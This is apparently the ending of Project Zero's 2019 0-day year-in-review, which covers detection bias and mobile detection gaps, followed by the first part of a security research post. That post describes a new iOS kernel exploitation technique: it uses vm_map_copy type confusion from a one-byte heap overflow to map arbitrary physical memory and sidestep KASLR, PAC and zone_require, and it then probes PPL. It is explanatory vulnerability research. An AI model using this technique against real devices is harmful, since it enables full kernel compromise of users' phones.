Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.

Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?

CVE
Windows 7 SP1
Windows 8.1
Windows 10
Win 10 1607
WIn 10 1703
WIn 10 1803
Win 10 1809
Win 10 1903
Exploitation of Latest SW Release?
Component
CVE-2019-0676
X
X
X
X
X
X
X

Yes (1809)
IE
CVE-2019-0808
X







N/A (1809)
win32k
CVE-2019-0797

X
X
X
X
X
X

Exploitation Unlikely (1809)
win32k
CVE-2019-0703
X
X
X
X
X
X
X

Yes (1809)
Windows SMB
CVE-2019-0803
X
X
X
X
X
X
X

Exp More Likely (1809)
win32k
CVE-2019-0859
X
X
X
X
X
X
X

Exp More Likely (1809)
win32k
CVE-2019-0880
X
X
X
X
X
X
X
X
Exp More Likely (1903)
splwow64
CVE-2019-1132
X







N/A (1903)
win32k
CVE-2019-1367
X
X
X
X
X
X
X
X
Yes (1903)
IE
CVE-2019-1429
X

X
X
X
X
X
X
Yes (1903)
IE
CVE-2019-1458
X
X
X
X




N/A (1909)
win32k

Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429

While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG)

Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674. 

A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug. 

Memory Corruption

63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free’s being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.

Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.

More Thoughts on Detection

As we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”. 

We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..

Who is doing the detecting? 

Another interesting side of detection is that a single security researcher, Clément Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. 

Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation.

“Clandestine” 0-day reporting

Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.

0-day Detection on Mobile Platforms

As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?

Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.

Detection on Other Platforms

It’s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform.

Conclusion

Here’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. 

Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019. 

One Byte to rule them all

30 July 2020 at 16:17
By: Tim
Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

A diagram showing the heap arrangement of a vm_map_copy object of type ENTRY_LIST. The vm_map_entrys are stored in a circular doubly-linked list. Each entry holds a pointer to a vm_object describing the memory region for that entry. Each vm_object contains a singly-linked list of vm_pages describing the physical pages backing the memory object.


Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

A diagram showing the layout of a vm_map_copy of type KERNEL_BUFFER. Rather than having a linked list of vm_map_entrys, there is an inline array of data to be copied directly into the receiving address space.


As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.

Comparing vm_map_copy objects of type KERNEL_BUFFER and ENTRY_LIST, the "next" pointer of the ENTRY_LIST-type copy falls into the inline data of the KERNEL_BUFFER-type copy.


With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.

Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

If we start with a KERNEL_BUFFER vm_map_copy and corrupt the first byte to change the type to ENTRY_LIST, then we can control the value of the "next" field to make it point to a fake vm_map_entry hierarchy, including a fake vm_page. The physical address specified in the vm_page's "vmp_phys_page" field will be mapped by the call to vm_map_copyout_internal().

An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  1. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.

  1. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

There are 3 fake vm_map_entry objects in the shared memory buffer, representing the 3 states of our mapping operation. To start, the "ready" entry forwards to the "done" entry, which loops back to itself.


We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

A vm_map_copy of type KERNEL_BUFFER includes inline kernel data; overlapping what would be the "next" field in an ENTRY_LIST copy is the value of a pointer to the "ready" entry in our shared memory buffer. But at this point, the copy's type is KERNEL_BUFFER, so the "pointer" is really just inline data.


We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

A one-byte overflow into the vm_map_copy changes its type from KERNEL_BUFFER to ENTRY_LIST. At this point, the inline data is now interpreted as a vm_map_header with a "next" field pointing to the "ready" entry.


We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

Calling vm_map_copyout_internal() on the corrupted vm_map_copy will traverse the linked list, going from "ready" to "done" and spinning in an infinite loop on "done".


At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

To get ready to map a physical page, we make the "ready" entry point to itself and then make the "done" entry point to the "ready" entry. The for loop in vm_map_copyout_internal() will follow the updated link from the "done" entry to the "ready" entry then spin on "ready". This state indicates that we're ready to set up the physical mapping.


While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Now that the mapping primitive is "ready", we will modify the "mapping" entry to map the desired physical page. We mark it as wired and specify a vm_object and vm_page containing the physical address to map. Also, we make the "done" entry link to itself to ensure the mapping happens only once.


Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.

Finally, we map a page by simply linking the "ready" entry to the "mapping" entry, causing vm_map_copyout_internal() to follow the link and process the "mapping" entry. Since it is wired, it maps in the page right away. Finally, once the mapping is complete, vm_map_copyout_internal() will follow the link and start spinning on the "done" entry, indicating that the operation has completed.


This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

This is a screenshot of a device panic.

The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.

A map of DRAM. The first little slice at the beginning, and a bigger slice at the end, are reserved for coprocessors, while the vast bulk of DRAM in the middle is for the Application Processor.


At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

Looking at the AP's DRAM over time, unmappable pages are scattered semi-randomly throughout the physical address space, and pages can both enter and exit PPL.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

